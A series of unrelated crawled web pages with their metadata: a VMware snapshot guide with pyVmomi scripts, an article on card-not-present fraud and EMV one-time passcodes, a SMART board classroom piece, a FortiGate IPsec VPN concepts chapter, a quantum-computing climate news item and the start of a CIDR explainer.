It is possible to exclude disks by changing the disk mode to independent, covered here. However please use this option with care as it may have other implications. For example if your backup software uses snapshots as part of the backup process then setting independent disks may inadvertently exclude these disks from backups.
How do I revert back to a snapshot?
Select the snapshot you want to revert back to, and click the revert icon in the top left of the snapshot menu. The icon dialog reads ‘revert the VM to the state it was in when the snapshot was taken’.
Review the confirmation message. The virtual machine state and data will be reverted back to the point in time when the selected snapshot was taken. The current state of the virtual machine (changes made since the snapshot was taken) will be lost unless you have taken a further snapshot. Click Yes to continue.
If you have multiple snapshots you will see the ‘you are here’ marker move to the point in the chain you have reverted to. Snapshots taken after this point are still valid and can be reverted to if required. After you have reverted to a snapshot you are happy with you need to save, or commit, the state of the virtual machine. More on this below.
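Reverting can also be scripted. Continuing the pyVmomi sketch above (same session and `vm` object assumed), this walks the snapshot tree by name and reverts to the matching snapshot:

```python
def find_snapshot(tree, name):
    """Recursively search the snapshot tree for a snapshot with the given name."""
    for node in tree:
        if node.name == name:
            return node.snapshot
        match = find_snapshot(node.childSnapshotList, name)
        if match:
            return match
    return None

if vm.snapshot is not None:
    target = find_snapshot(vm.snapshot.rootSnapshotList, "pre-upgrade")
    if target:
        target.RevertToSnapshot_Task()
```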
How do I keep the state of the virtual machine?
When you keep the current state of the virtual machine the delta disks are merged with the base disks, committing the changes and the current state of the virtual machine. This is done by using the delete snapshot options in Snapshot Manager.
- Delete All – deletes all snapshots from the virtual machine. This merges the delta disk(s) with the base disk(s) to save, or commit, the virtual machine data and configuration at the current point in time. If you have reverted to a snapshot you still need to delete all snapshots to start writing to the base disk again.
- Delete – deletes individual snapshots from a chain; writing disk changes since the previous snapshot to the parent snapshot delta disk. If only a single snapshot exists then deleting this snapshot is the same as a Delete All for multiple snapshots; the VM state is committed and data is written to the base disk as normal.
Right click the virtual machine in the vSphere web client and select Snapshots, Manage Snapshots. From the All Actions menu select Delete Snapshot to delete the selected snapshot, or Delete All Snapshots. In this example we are deleting all snapshots, so click Yes to confirm.
All snapshots are now removed and the current state of the virtual machine is committed to the base disk. Any changes made from here on in are written to the base disk as normal, unless another snapshot is taken.
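As a rough scripted equivalent (same pyVmomi session and `vm` object assumed), the chain can be listed and then committed by removing all snapshots:

```python
def print_chain(tree, depth=0):
    for node in tree:
        print("  " * depth + node.name)
        print_chain(node.childSnapshotList, depth + 1)

if vm.snapshot is not None:
    print_chain(vm.snapshot.rootSnapshotList)
    # Equivalent of "Delete All": merge the delta disks and commit the current state.
    vm.RemoveAllSnapshots_Task()
```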
What is snapshot consolidation?
Snapshot consolidation is useful if a Delete or Delete All operation fails; for example, if a large number of snapshots exist on a virtual machine with high I/O, or if a third-party tool such as backup software utilising snapshots is unable to delete redundant delta disks. Using the consolidate option removes any redundant delta disks to improve virtual machine performance and save storage space. This is done by combining the delta disks with the base disk(s) without violating a data dependency; the active state of the virtual machine does not change.
To determine if a virtual machine requires consolidation browse to the vCenter Server, cluster, or host level in the vSphere web client and click the VMs tab. Right click anywhere in the column headers and select Show/Hide Columns. Tick Needs Consolidation and click Ok.
If a virtual machine requires consolidation, right click and select Snapshots, Consolidate. There is also a default alarm, defined at the vCenter level, for virtual machine consolidation needed.
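For scripted environments, the same check and action are available through the API; a short sketch (same pyVmomi session and `vm` object assumed):

```python
# runtime.consolidationNeeded mirrors the "Needs Consolidation" column in the web client.
if vm.runtime.consolidationNeeded:
    vm.ConsolidateVMDisks_Task()
```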
From vSphere 6 onwards the snapshot consolidation process was improved. You can read more about the specifics, and testing, in this blog post by Luca Dell’Oca.
The snapshot functions described in this post can also be managed using PowerCLI, this blog post by Anne Jan Elsinga covers the commands you’ll need. | <urn:uuid:ebc890f3-06f1-4ca1-bb7b-0fb8c6b5f12e> | CC-MAIN-2022-40 | https://esxsi.com/2016/12/02/snapshots/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335573.50/warc/CC-MAIN-20221001070422-20221001100422-00319.warc.gz | en | 0.903864 | 1,681 | 2.71875 | 3 |
Of the security issues facing banks everywhere, prevention of card fraud has always been a high priority, and is set to grow even further in importance. The level of card fraud has risen significantly over recent years, caused in the main by the explosion in the number and usage of payment cards and the associated high level of organised card crime activity.
For example, over the past decade, fraud losses on UK-issued plastic cards have risen from £96.8m to a staggering £402.4m a year. And these figures do not take into account the 'soft' costs related to card fraud, such as tarnish to reputation and potential legal costs.
Numerous types of card fraud have been developed over the years and are regularly committed throughout the world. The most prevalent and commonly known type is counterfeit card fraud. However, as new banking channels have opened up, for example internet, phone banking and e-commerce, and the boom in credit card use, crime has migrated to seek any opportunity to attack these new and immature transaction methods.
The losses associated with these attacks have risen drastically over the past couple of years, and counterfeit fraud has now been overtaken as the most costly type of card fraud by a newer method, that of Cardholder-Not-Present (CNP) fraud. In the UK last year, CNP fraud was responsible for losses of £116.4m – more than any other type of card fraud.
CNP transactions are performed remotely, when neither the card nor the cardholder is present at the point-of-sale. CNP transactions take many forms such as orders made over the phone or internet, by mail order or fax. In such transactions, retailers are unable to physically check the card or the identity of the cardholder, which makes the user anonymous and able to disguise their true identity. Fraudulently obtained card details are generally used with fabricated personal details to make fraudulent CNP purchases. The card details are normally copied without the cardholder's knowledge, taken from discarded receipts or obtained by skimming. This means that while the three or four digit Card Security Code on the back of cards can help prevent fraud where card details have been obtained, it does not prevent fraud in cases where the card itself has been stolen.
Ironically, another reason CNP fraud is on the increase is because of the advent of EMV smart cards – a technology that was introduced to tackle counterfeit fraud. The major advantage of smart cards is the increased security they provide. The chip technology uses sophisticated processing techniques to identify authentic cards and make counterfeiting extremely difficult and expensive. Combining this with a PIN is a proven system for combating fraud as it provides the two-factor authentication of ‘something you have’ (the smart card) and ‘something you know’ (the PIN). This makes the probability of fraudulent transactions taking place in an ordinary retail environment extremely low.
By making cardholder present fraud so difficult through the introduction of smart cards, it is predicted that CNP fraud will increase further, along with other forms of fraud such as advanced internet fraud techniques like phishing. At the same time, levels of e-Commerce and internet banking continue to rise and more and more transactions are performed without the physical presence of the user or card.
Two factor authentication is key
Banks are having to face up to the realities of the modern highly connected world, which now provides a vast array of opportunities for banks to interact with customers. It has meant that whether as a consumer or a business, the number of transaction channels is now extremely varied and continuing to grow, yet it is not a scenario that all banks are fully prepared for.
At the moment the maximum level of security available to consumers for e-transactions is user ID and password authentication. However, this is already seen as being inadequate for securing financial transactions. Instead, pioneering banks and credit card providers are turning to the obvious candidate for reducing CNP fraud, the EMV smart card.
The reason that the EMV smart card is not already used within consumer e-transactions is the difficulty in including the card within the transaction process. The solution for this, an unconnected reader, is not new. However, the barrier has always been around cost. In other words, is it more cost effective for the bank to accept low levels of fraud rather than the expense of rolling out millions of unconnected readers to consumers? The continuing rise of CNP fraud is beginning to tilt the argument in favour of the rollout option.
In terms of the technology behind the unconnected smart card readers, it is the introduction of a common standard that is the most important innovation. APACS, in association with MasterCard, released specification standards for unconnected smart card readers which have allowed leading manufacturers to offer products for mass consumption at a commercially viable cost.
The reader provides the user interface to the card and displays a one-time passcode once it has read the smart card and the user has entered his/her PIN. The user then manually types this passcode into the computer at the appropriate prompt. Only the issuing bank can authenticate this one-time passcode. To avoid repeat attacks, the one-time passcode can also be linked to the individual transaction by a more secure, yet still simple, challenge–response process. In that case, should the passcode be intercepted, it is of no use whatsoever beyond that single transaction.
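The real reader schemes (such as EMV CAP) are specified by the card networks and run inside the card's chip, but the underlying challenge-response idea can be illustrated with a simple keyed-hash sketch. Everything here (the secret, the challenge format, the truncation to eight digits) is a hypothetical simplification, not the actual algorithm:

```python
import hmac, hashlib

def one_time_passcode(card_secret: bytes, challenge: str, pin: str) -> str:
    """Illustrative only: derive a short one-time code from a per-card secret."""
    digest = hmac.new(card_secret, (challenge + pin).encode(), hashlib.sha256).digest()
    # Truncate to an 8-digit code the user can type or read out.
    return str(int.from_bytes(digest[:4], "big") % 10**8).zfill(8)

secret = b"per-card key shared by chip and issuer"   # hypothetical
challenge = "2015-03-06T17:45:01/4711"               # e.g. derived from the transaction

code = one_time_passcode(secret, challenge, pin="1234")
# The issuing bank holds the same secret, so it can recompute and compare the code.
assert code == one_time_passcode(secret, challenge, pin="1234")
```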
Assuming that consumers will not resist the introduction of unconnected readers, this new system will have an extremely positive effect on fraud and in turn help boost consumer confidence in e-Commerce. However, it is not just internet-based transactions that will benefit. Theoretically, any transaction where the card has to be used, and the cardholder is not present, could use this scheme. For example, if purchasing a good or service over the phone, the user could simply read the one time passcode to the person at the other end who could validate it in the usual way through the payment system. As such the smart card is transformed into a personal security module to validate every financial transaction the user wishes to make.
The security benefits are clear to see. The inclusion of a smart card in every financial transaction will add a crucial second layer of authentication. This two-factor authentication process of something you have as well as something you know should dramatically reduce fraud.
The move towards two-factor authentication for all transactions using smart cards is an important example of a security model that is able to grow organically and embrace and integrate new transaction technologies and channels, as and when required. This kind of flexible, yet secure and dependable system is key for today's advancing e-business world and, crucially, is now a commercial possibility.
In an age when students have grown up surrounded by technology, it makes sense that teachers would use technology to create interesting lessons. Many teachers have had SMART boards installed in their classrooms and have never looked back. The SMART board makes lessons more interactive and appealing to modern students. You may already have a SMART board and are looking for ways to use it this year, or perhaps you are thinking of getting a SMART board and are wondering what you could do with it. Here are a few fun ways to use a SMART board in the classroom this year!
Use Built-In Activity Templates
Most interactive whiteboard software comes with built-in templates that make it easy for teachers to design their own games to supplement lessons. These templates are definitely not something to overlook! These lessons often cover core subjects and have fun themes that will appeal to students, like beach theme or alien theme!
Let Students Use Their Phones
This is usually a big no-no in class, but giving students some time to use their phones in a productive way is good for the whole class. Letting students use their phones allows even the shy students to participate. Check out SMART Notebook’s LAB for Shout It Out! activities that require students to use their phones to submit a picture or text response. Rather than calling on single students for answers, you can get the whole class to participate!
Teach Math with Visual Manipulatives
SMART Notebook is an extremely useful tool when it comes to using your SMART board. SMART Notebook offers a Math Equation Editor that can transform handwritten equations and formulas into text! Then, when you need a visual aid, you can turn the text into a graph. It’s a huge time-saver!
Get in Touch with FiberPlus
FiberPlus has been providing data communication services for a number of different markets through fiber optics since 1992. What began as a cable installation company for Local Area Networks has grown into a top telecommunications business that can provide the Richmond, VA, Columbus, OH, Pittsburgh, PA, Baltimore, MD, Washington DC, and Northern Virginia areas with a number of different services. These services now include:
- Structured Cabling
- Electronic Security Systems
- Distributed Antenna Systems
- Audio/Visual Services
- Support Services
- Specialty Systems
- Design/Build Services
FiberPlus promises the communities in which we serve that we will continue to expand and evolve as new technology is introduced within the telecommunications industry.
Have any questions? Interested in one of our services? Call FiberPlus today 800-394-3301, email us at email@example.com, or visit our contact page. | <urn:uuid:9ebce39f-6c89-46fa-8d75-8a6c1a8a566a> | CC-MAIN-2022-40 | https://www.fiberplusinc.com/systems-offered/ways-to-use-your-smart-board-this-year/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00319.warc.gz | en | 0.942718 | 563 | 3.125 | 3 |
IPsec VPN concepts
Virtual Private Network (VPN) technology enables remote users to connect to private computer networks to gain access to their resources in a secure way. For example, an employee traveling or working from home can use a VPN to securely access the office network through the Internet.
Instead of remotely logging on to a private network using an unencrypted and unsecure Internet connection, the use of a VPN ensures that unauthorized parties cannot access the office network and cannot intercept any of the information that is exchanged between the employee and the office. It is also common to use a VPN to connect the private networks of two or more offices.
Fortinet offers VPN capabilities in the FortiGate Unified Threat Management (UTM) appliance and in the FortiClient Endpoint Security suite of applications. A FortiGate unit can be installed on a private network, and FortiClient software can be installed on the user’s computer. It is also possible to use a FortiGate unit to connect to the private network instead of using FortiClient software.
This chapter discusses VPN terms and concepts, including:

- VPN tunnels
- Clients, servers, and peers
- Phase 1 and Phase 2 settings
- IKE and IPsec packet processing
The data path between a user’s computer and a private network through a VPN is referred to as a tunnel. Like a physical tunnel, the data path is accessible only at both ends. In the telecommuting scenario, the tunnel runs between the FortiClient application on the user’s PC, or a FortiGate unit or other network device and the FortiGate unit on the office private network.
Encapsulation makes this possible. IPsec packets pass from one end of the tunnel to the other and contain data packets that are exchanged between the local user and the remote private network. Encryption of the data packets ensures that any third-party who intercepts the IPsec packets can not access the data.
Encoded data going through a VPN tunnel
You can create a VPN tunnel between:
- A PC equipped with the FortiClient application and a FortiGate unit
- Two FortiGate units
- Third-party VPN software and a FortiGate unit
For more information on third-party VPN software, refer to the Fortinet Knowledge Base.
Several tunnel templates are available in the IPsec VPN Wizard that cover a variety of different types of IPsec VPN. A list of these templates appear on the first page of the Wizard, located at VPN > IPsec Wizard. The tunnel template list follows.
IPsec VPN Wizard options
| VPN Type | Remote Device Type | NAT Options | Description |
|---|---|---|---|
| Site to Site | FortiGate | No NAT between sites; This site is behind NAT; The remote site is behind NAT | Static tunnel between this FortiGate and a remote FortiGate. |
| Site to Site | Cisco | No NAT between sites; This site is behind NAT; The remote site is behind NAT | Static tunnel between this FortiGate and a remote Cisco firewall. |
| Remote Access | FortiClient VPN for OS X, Windows, and Android | N/A | On-demand tunnel for users using the FortiClient software. |
| Remote Access | iOS Native | N/A | On-demand tunnel for iPhone/iPad users using the native iOS IPsec client. |
| Remote Access | Android Native | N/A | On-demand tunnel for Android users using the native L2TP/IPsec client. |
| Remote Access | Windows Native | N/A | On-demand tunnel for Windows users using the native L2TP/IPsec client. |
| Remote Access | Cisco Client | N/A | On-demand tunnel for users using the Cisco IPsec client. |
| Custom | N/A | N/A | No Template. |
VPN tunnel list
Once you create an IPsec VPN tunnel, it appears in the VPN tunnel list at VPN > IPsec Tunnels. By default, the tunnel list indicates the name of the tunnel, its interface binding, the tunnel template used, and the tunnel status. If you right-click on the table header row, you can include columns for comments, IKE version, mode (aggressive vs main), phase 2 proposals, and reference number. The tunnel list page also includes the option to create a new tunnel, as well as the options to edit or delete a highlighted tunnel.
A gateway is a router that connects the local network to other networks. The default gateway setting in your computer’s TCP/IP properties specifies the gateway for your local network.
A VPN gateway functions as one end of a VPN tunnel. It receives incoming IPsec packets, decrypts the encapsulated data packets and passes the data packets to the local network. Also, it encrypts data packets destined for the other end of the VPN tunnel, encapsulates them, and sends the IPsec packets to the other VPN gateway. The VPN gateway is a FortiGate unit because the private network behind it is protected, ensuring the security of the unencrypted VPN data. The gateway can also be FortiClient software running on a PC since the unencrypted data is secure on the PC.
The IP address of a VPN gateway is usually the IP address of the network interface that connects to the Internet. Optionally, you can define a secondary IP address for the interface and use that address as the local VPN gateway address. The benefit of doing this is that your existing setup is not affected by the VPN settings.
The following diagram shows a VPN connection between two private networks with FortiGate units acting as the VPN gateways. This configuration is commonly referred to as Gateway-to-Gateway IPsec VPN.
VPN tunnel between two private networks
Although the IPsec traffic may actually pass through many Internet routers, you can visualize the VPN tunnel as a simple secure connection between the two FortiGate units.
Users on the two private networks do not need to be aware of the VPN tunnel. The applications on their computers generate packets with the appropriate source and destination addresses, as they normally do. The FortiGate units manage all the details of encrypting, encapsulating, and sending the packets to the remote VPN gateway.
The data is encapsulated in IPsec packets only in the VPN tunnel between the two VPN gateways. Between the user’s computer and the gateway, the data is on the secure private network and it is in regular IP packets.
For example User1 on the Site A network, at IP address 10.10.1.7, sends packets with destination IP address 192.168.10.8, the address of User2 on the Site B network. The Site A FortiGate unit is configured to send packets with destinations on the 192.168.10.0 network through the VPN, encrypted and encapsulated. Similarly, the Site B FortiGate unit is configured to send packets with destinations on the 10.10.1.0 network through the VPN tunnel to the Site A VPN gateway.
In the site-to-site, or gateway-to-gateway VPN shown below, the FortiGate units have static (fixed) IP addresses and either unit can initiate communication.
You can also create a VPN tunnel between an individual PC running FortiClient and a FortiGate unit, as shown below. This is commonly referred to as Client-to-Gateway IPsec VPN.
VPN tunnel between a FortiClient PC and a FortiGate unit
On the PC, the FortiClient application acts as the local VPN gateway. Packets destined for the office network are encrypted, encapsulated into IPsec packets, and sent through the VPN tunnel to the FortiGate unit. Packets for other destinations are routed to the Internet as usual. IPsec packets arriving through the tunnel are decrypted to recover the original IP packets.
Clients, servers, and peers
A FortiGate unit in a VPN can have one of the following roles:
- Server — responds to a request to establish a VPN tunnel.
- Client — contacts a remote VPN gateway and requests a VPN tunnel.
- Peer — brings up a VPN tunnel or responds to a request to do so.
The site-to-site VPN shown above is a peer-to-peer relationship. Either FortiGate unit VPN gateway can establish the tunnel and initiate communications. The FortiClient-to-FortiGate VPN shown below is a client-server relationship. The FortiGate unit establishes a tunnel when the FortiClient PC requests one.
A FortiGate unit cannot be a VPN server if it has a dynamically-assigned IP address. VPN clients need to be configured with a static IP address for the server. A FortiGate unit acts as a server only when the remote VPN gateway has a dynamic IP address or is a client-only device or application, such as FortiClient.
As a VPN server, a FortiGate unit can also offer automatic configuration for FortiClient PCs. The user needs to know only the IP address of the FortiGate VPN server and a valid user name/password. FortiClient downloads the VPN configuration settings from the FortiGate VPN server. For information about configuring a FortiGate unit as a VPN server, see the FortiClient Administration Guide.
Encryption mathematically transforms data to appear as meaningless random numbers. The original data is called plaintext and the encrypted data is called ciphertext. The opposite process, called decryption, performs the inverse operation to recover the original plaintext from the ciphertext.
The process by which the plaintext is transformed to ciphertext and back again is called an algorithm. All algorithms use a small piece of information, a key, in the arithmetic process of converted plaintext to ciphertext, or vice-versa. IPsec uses symmetrical algorithms, in which the same key is used to both encrypt and decrypt the data. The security of an encryption algorithm is determined by the length of the key that it uses. FortiGate IPsec VPNs offer the following encryption algorithms, in descending order of security:
AES–GCM Galois/Counter Mode (GCM), a block cipher mode of operation providing both confidentiality and data origin authentication.
AES256 A 128-bit block algorithm that uses a 256-bit key.
AES192 A 128-bit block algorithm that uses a 192-bit key.
AES128 A 128-bit block algorithm that uses a 128-bit key.
3DES Triple-DES, in which plain text is DES-encrypted three times by three keys.
DES Data Encryption Standard, a 64-bit block algorithm that uses a 56-bit key
The default encryption algorithms provided on FortiGate units make recovery of encrypted data almost impossible without the proper encryption keys.
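As an aside, AES-GCM from the list above can be exercised directly in Python with the third-party `cryptography` package; this is a generic illustration of the mode, not FortiOS code:

```python
import os
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

key = AESGCM.generate_key(bit_length=256)   # AES256 in GCM mode
aead = AESGCM(key)

nonce = os.urandom(12)                      # must never repeat for the same key
plaintext = b"packet payload"
aad = b"header fields"                      # authenticated but not encrypted

ciphertext = aead.encrypt(nonce, plaintext, aad)
assert aead.decrypt(nonce, ciphertext, aad) == plaintext
```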
There is a human factor in the security of encryption. The key must be kept secret, known only to the sender and receiver of the messages. Also, the key must not be something that unauthorized parties might easily guess, such as the sender’s name, birthday or simple sequence such as 123456.
The FortiGate sets an IPsec tunnel Maximum Transmission Unit (MTU) of 1436 for 3DES/SHA1 and an MTU of 1412 for AES128/SHA1, as seen with diag vpn tunnel list. This indicates that the FortiGate allocates 64 bytes of overhead for 3DES/SHA1 and 88 bytes for AES128/SHA1, which is the difference if you subtract this MTU from a typical ethernet MTU of 1500 bytes.
During the encryption process, AES/DES operates using a specific size of data which is block size. If data is smaller than that, it will be padded for the operation. MD5/SHA-1 HMAC also operates using a specific block size.
The following table describes the potential maximum overhead for each IPsec encryption:
| IPsec Transform Set | IPsec Overhead (Max. bytes) |
|---|---|
| ESP–AES (256, 192, or 128), ESP-SHA-HMAC, or MD5 | 73 |
| ESP–AES (256, 192, or 128) | 61 |
| ESP-(DES or 3DES), ESP-SHA-HMAC, or MD5 | |
| ESP–Null, ESP-SHA-HMAC, or MD5 | |
| AH–SHA–HMAC or MD5 | |
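The tunnel MTU figures quoted earlier follow directly from this overhead; a trivial sketch of the arithmetic:

```python
LINK_MTU = 1500

# Overheads in bytes, taken from the figures quoted above.
esp_overhead = {"3DES/SHA1": 64, "AES128/SHA1": 88}

for suite, overhead in esp_overhead.items():
    print(f"{suite}: tunnel MTU = {LINK_MTU - overhead}")
# 3DES/SHA1: tunnel MTU = 1436
# AES128/SHA1: tunnel MTU = 1412
```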
To protect data via encryption, a VPN must ensure that only authorized users can access the private network. You must use either a preshared key on both VPN gateways or RSA X.509 security certificates. The examples in this guide use only preshared key authentication. Refer to the Fortinet Knowledge Base for articles on RSA X.509 security certificates.
A preshared key contains at least six random alphanumeric characters. Users of the VPN must obtain the preshared key from the person who manages the VPN server and add the preshared key to their VPN client configuration.
Although it looks like a password, the preshared key, also known as a shared secret, is never sent by either gateway. The preshared key is used in the calculations at each end that generate the encryption keys. As soon as the VPN peers attempt to exchange encrypted data, preshared keys that do not match will cause the process to fail.
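A simplified sketch of that idea, loosely modelled on the IKEv1 derivation in RFC 2409, where the preshared key keys a pseudo-random function over the exchanged nonces (the choice of HMAC-SHA256 here is illustrative):

```python
import hmac, hashlib, os

psk = b"correct horse battery staple"        # shared secret, never sent on the wire
ni, nr = os.urandom(32), os.urandom(32)      # initiator and responder nonces, exchanged openly

# Roughly: SKEYID = prf(preshared key, Ni | Nr); further keys are derived from SKEYID.
skeyid = hmac.new(psk, ni + nr, hashlib.sha256).digest()
print(skeyid.hex())
```

Because both ends must hold the same preshared key to arrive at the same keying material, a mismatched key causes the exchange to fail as soon as encrypted data is attempted.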
To increase security, you can require additional means of authentication from users, such as:
- An identifier, called a peer ID or a local ID.
- Extended authentication (XAUTH) which imposes an additional user name/password requirement.
A Local ID is an alphanumeric value assigned in the Phase 1 configuration. The Local ID of a peer is called a Peer ID.
In FortiOS 5.2, new authentication methods have been implemented for IKE: ECDSA-256, ECDSA-384, and ECDSA-521. However, AES-XCBC is not supported.
Phase 1 and Phase 2 settings
A VPN tunnel is established in two phases: Phase 1 and Phase 2. Several parameters determine how this is done. Except for IP addresses, the settings simply need to match at both VPN gateways. There are defaults that are appropriate for most cases.
FortiClient distinguishes between Phase 1 and Phase 2 only in the VPN Advanced settings and uses different terms. Phase 1 is called the IKE Policy. Phase 2 is called the IPsec Policy.
In Phase 1, the two VPN gateways exchange information about the encryption algorithms that they support and then establish a temporary secure connection to exchange authentication information.
When you configure your FortiGate unit or FortiClient application, you must specify the following settings for Phase 1:
- Remote gateway: The remote VPN gateway's address. FortiGate units also have the option of operating only as a server by selecting the "Dialup User" option.
- Preshared key: This must be the same at both ends. It is used to encrypt Phase 1 authentication information.
- Local interface: The network interface that connects to the other VPN gateway. This applies on a FortiGate unit only.
All other Phase 1 settings have default values. These settings mainly configure the types of encryption to be used. The default settings on FortiGate units and in the FortiClient application are compatible. The examples in this guide use these defaults.
For more detailed information about Phase 1 settings, see Phase 1 parameters on page 1624.
Similar to the Phase 1 process, the two VPN gateways exchange information about the encryption algorithms that they support for Phase 2. You may choose different encryption for Phase 1 and Phase 2. If both gateways have at least one encryption algorithm in common, a VPN tunnel can be established. Keep in mind that the more algorithms each phase proposes that the other gateway does not share, the longer negotiations will take. In extreme cases this may cause timeouts during negotiations.
To configure default Phase 2 settings on a FortiGate unit, you need only select the name of the corresponding Phase 1 configuration. In FortiClient, no action is required to enable default Phase 2 settings. For more detailed information about Phase 2 settings, see Phase 2 parameters on page 1642.
The establishment of a Security Association (SA) is the successful outcome of Phase 1 negotiations. Each peer maintains a database of information about VPN connections. The information in each SA can include cryptographic algorithms and keys, keylife, and the current packet sequence number. This information is kept synchronized as the VPN operates. Each SA has a Security Parameter Index (SPI) that is provided to the remote peer at the time the SA is established. Subsequent IPsec packets from the peer always reference the relevant SPI. It is possible for peers to have multiple VPNs active simultaneously, and correspondingly multiple SPIs.
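Conceptually, each peer's SA database is a lookup keyed by SPI. The sketch below is purely illustrative; the field names are assumptions and do not reflect FortiOS internals:

```python
from dataclasses import dataclass

@dataclass
class SecurityAssociation:
    spi: int                  # Security Parameter Index referenced by incoming IPsec packets
    encryption: str           # e.g. "AES128"
    authentication: str       # e.g. "SHA1"
    key: bytes
    keylife_seconds: int
    sequence_number: int = 0

sa_database = {}              # SA database, keyed by SPI

sa = SecurityAssociation(spi=0x10000001, encryption="AES128", authentication="SHA1",
                         key=bytes(16), keylife_seconds=43200)
sa_database[sa.spi] = sa

def lookup(spi):
    # Each arriving IPsec packet references the relevant SPI.
    return sa_database[spi]
```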
IKE and IPsec packet processing
Internet Key Exchange (IKE) is the protocol used to set up SAs in IPsec negotiation. As described in Phase 1 parameters on page 1624, you can optionally choose IKEv2 over IKEv1 if you configure a route-based IPsec VPN. IKEv2 simplifies the negotiation process, in that it:
- Provides no choice of Aggressive or Main mode in Phase 1.
- Does not support Peer Options or Local ID.
- Does not allow Extended Authentication (XAUTH).
- Allows you to select only one Diffie-Hellman Group.
- Uses less bandwidth.
The following sections identify how IKE versions 1 and 2 operate and differentiate.
A peer, identified in the IPsec policy configuration, begins the IKE negotiation process. This IKE Security Association (SA) agreement is known as Phase 1. The Phase 1 parameters identify the remote peer or clients and supports authentication through preshared keys or digital certificates. You can increase access security further using peer identifiers, certificate distinguished names, group names, or the FortiGate extended authentication (XAuth) option for authentication purposes. Basically, Phase 1 authenticates a remote peer and sets up a secure communication channel for establishing Phase 2, which negotiates the IPsec SA.
IKE Phase 1 can occur in either Main mode or Aggressive mode. For more information, see Phase 1 parameters on page 1624.
IKE Phase 1 is successful only when the following are true:
- Each peer negotiates a matching IKE SA policy.
- Each peer is authenticated and their identities protected.
- The Diffie-Hellman exchange is authenticated (the pre-shared secret keys match). For more information on Phase 1, see Phase 1 parameters on page 1624.
Phase 2 parameters define the algorithms that the FortiGate unit can use to encrypt and transfer data for the remainder of the session in an IPsec SA. The basic Phase 2 settings associate IPsec Phase 2 parameters with a Phase 1 configuration.
In Phase 2, the VPN peer or client and the FortiGate unit exchange keys again to establish a more secure communication channel. The Phase 2 Proposal parameters select the encryption and authentication algorithms needed to generate keys for protecting the implementation details of the SA. The keys are generated automatically using a Diffie-Hellman algorithm.
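The Diffie-Hellman idea itself is easy to demonstrate with textbook-sized numbers; real IKE negotiations use standardised groups with primes of 1024 bits and up, so the values below are purely illustrative:

```python
import secrets

p, g = 23, 5                                 # toy modulus and generator

a = secrets.randbelow(p - 2) + 1             # initiator's private value
b = secrets.randbelow(p - 2) + 1             # responder's private value

A = pow(g, a, p)                             # public values exchanged in the clear
B = pow(g, b, p)

assert pow(B, a, p) == pow(A, b, p)          # both ends derive the same shared secret
```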
In Phase 2, Quick mode selectors determine which IP addresses can perform IKE negotiations to establish a tunnel. By only allowing authorized IP addresses access to the VPN tunnel, the network is more secure. For more information, see Phase 2 parameters on page 1642.
IKE Phase 2 is successful only when the following are true:
- The IPsec SA is established and protected by the IKE SA.
- The IPsec SA is configured to renegotiate after set durations (see Phase 2 parameters on page 1642 and Phase 2 parameters on page 1642).
- Optional: Replay Detection is enabled. Replay attacks occur when an unauthorized party intercepts a series of IPsec packets and replays them back into the tunnel. See Phase 2 parameters on page 1642.
- Optional: Perfect Forward Secrecy (PFS) is enabled. PFS improves security by forcing a new Diffie-Hellman exchange whenever keylife expires. See Phase 2 parameters on page 1642.
For more information on Phase 2, see Phase 2 parameters on page 1642.
With Phase 2 established, the IPsec tunnel is fully negotiated and traffic between the peers is allowed until the SA terminates (for any number of reasons; time-out, interruption, disconnection, etc).
Unlike Phase 1 of IKEv1, IKEv2 does not provide options for Aggressive or Main mode. Furthermore, Phase 1 of IKEv2 begins immediately with an IKE SA initiation, consisting of only two packets (containing all the information typically contained in four packets for IKEv1), securing the channel such that all following transactions are encrypted (see Phase 1 parameters on page 1624).
The encrypted transactions contain the IKE authentication, since remote peers have yet to be authenticated. This stage of IKE authentication in IKEv2 can loosely be called Phase 1.5.
As part of this phase, IKE authentication must occur. IKE authentication consists of the following:
- The authentication payloads and Internet Security Association and Key Management Protocol (ISAKMP) identifier.
- The authentication method (RSA, PSK, ECDSA, or EAP).
- The IPsec SA parameters.
Due to the number of authentication methods potentially used, and SAs established, the overall IKEv2 negotiation can range from 4 packets (no EAP exchange at all) to many more.
At this point, both peers have a security association complete and ready to encrypt traffic.
In IKEv1, Phase 2 uses Quick mode to negotiate an IPsec SA between peers. In IKEv2, since the IPsec SA is already established, Phase 2 is essentially only used to negotiate “child” SAs, or to re-key an IPsec SA. That said, there are only two packets for each exchange of this type, similar to the exchange at the outset of Phase 1.5.
Support for IKEv2 session resumption described in RFC 5723
If a gateway loses connectivity to the network, clients can attempt to re-establish the lost session by presenting the ticket to the gateway. As a result, sessions can be resumed much faster, as DH exchange that is necessary to establish a brand new connection is skipped. This feature implements “ticket-by-value”, whereby all information necessary to restore the state of a particular IKE SA is stored in the ticket and sent to the client.
Quantum Computers Could Help Tackle Climate Change Challenges
(TechHQ) In the fight against climate change, a plethora of new technologies will be required to not only transform conventional approaches that are contributing to world carbon emissions but also birth a new generation of green technologies. This article contends that quantum computers hold the key to realizing green solutions that can accelerate the goal of carbon neutrality by 2050.
The World Economic Forum (WEF) stated that by 2025, quantum computing "will have outgrown its infancy," and we'll see a first generation of commercially available quantum-inspired devices to "tackle meaningful, real-world problems."
Companies across industries are looking towards the future-forward tech to solve the challenges of today and tomorrow. Though quantum computers are not readily available or commercialized yet, it’s just a matter of time before an explosion of use cases are seen.
Aerospace giant Airbus has been advocating for the aviation industry to explore new fields such as AI and quantum computers to create a climate-neutral industry.
German automaker Volkswagen has been testing a quantum-inspired navigation app that will be baked into its vehicles within the next few years to prevent road congestion by ensuring the most efficient route is in use. | <urn:uuid:b9e17a2d-3d67-4fb1-aca8-366ac2621e66> | CC-MAIN-2022-40 | https://www.insidequantumtechnology.com/news-archive/quantum-computers-could-help-tackle-climate-change-challenges/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00319.warc.gz | en | 0.928716 | 254 | 3.234375 | 3 |
If you are in the business of IPv4 and IP Addresses you’ve probably heard or seen the term CIDR, but do you know what it is? Knowing what CIDR stands for is helpful, but it’s even better to explore how CIDR works and understand the concept. Below are some frequently asked questions that will increase your understanding of the term and why it is important.
What does CIDR Stand for?
